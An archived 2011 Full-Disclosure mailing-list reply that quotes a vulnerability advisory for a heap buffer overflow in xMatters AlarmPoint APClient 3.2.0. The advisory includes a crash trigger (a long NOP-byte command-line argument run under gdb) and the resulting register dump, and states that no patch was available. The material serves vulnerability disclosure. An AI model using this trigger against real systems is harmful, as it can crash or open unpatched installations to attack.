| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 28 Apr 2011 18:02:41 +0100
From: Cal Leeming <cal@...whisper.co.uk>
To: Juan Sacco <jsacco@...ecurityresearch.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Insect Pro - Advisory 2011 0428 - Zero Day -
Heap Buffer Overflow in xMatters APClient
On a side note, anyone here ever used any of the xmatters engines?? Care to
give a small review??
On Thu, Apr 28, 2011 at 4:03 PM, Juan Sacco
<jsacco@...ecurityresearch.com>wrote:
> Information
> --------------------
> Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
> Version: APClient 3.2.0 (native)
> Software : xMatters AlarmPoint
> Vendor Homepage : http://www.xmatters.com
> Vulnerability Type : Heap Buffer Overflow
> Md5: 283d98063323f35deb7afbd1db93d859 APClient.bin
> Severity : High
> Researcher : Juan Sacco <jsacco [at] insecurityresearch [dot] com>
>
> Description
> ------------------
> The AlarmPoint Java Server consists of a collection of software
> components and software APIs designed to provide a flexible and
> powerful set of tools for integrating various applications to
> AlarmPoint.
>
> Details
> -------------------
> AlarmPoint APClient is affected by a Heap Overflow vulnerability in
> version APClient 3.2.0 (native)
>
> A heap overflow condition is a buffer overflow, where the buffer that
> can be overwritten is allocated in the heap portion of memory, generally
> meaning that the buffer was allocated using a routine such as the POSIX
> malloc() call.
> https://www.owasp.org/index.php/Heap_overflow
>
>
> Exploit as follow:
> Submit a malicious file cointaining the exploit
> root@...gateway:/opt/alarmpointsystems/integrationagent/bin$
> ./APClient.bin --submit-file maliciousfile.hex
> or
> (gdb) run `python -c 'print "\x90"*16287'`
> Starting program:
> /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
> 'print "\x90"*16287'`
>
> Program received signal SIGSEGV, Segmentation fault.
> 0x0804be8a in free ()
> (gdb) i r
> eax 0xa303924 170932516
> ecx 0xbfb8 49080
> edx 0xa303924 170932516
> ebx 0x8059438 134583352
> esp 0xbfff3620 0xbfff3620
> ebp 0xbfff3638 0xbfff3638
> esi 0x8059440 134583360
> edi 0x80653f0 134632432
> eip 0x804be8a 0x804be8a <free+126>
> eflags 0x210206 [ PF IF RF ID ]
> cs 0x73 115
> ss 0x7b 123
> ds 0x7b 123
> es 0x7b 123
> fs 0x0 0
> gs 0x33 51
> (gdb)
>
>
> Solution
> -------------------
> No patch are available at this time.
>
> Credits
> -------------------
> Manual discovered by Insecurity Research Labs
> Juan Sacco - http://www.insecurityresearch.com
>
> --
> --
> _________________________________________________
> Insecurity Research - Security auditing and testing software
> Web: http://www.insecurityresearch.com
> Insect Pro 2.5 was released stay tunned
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists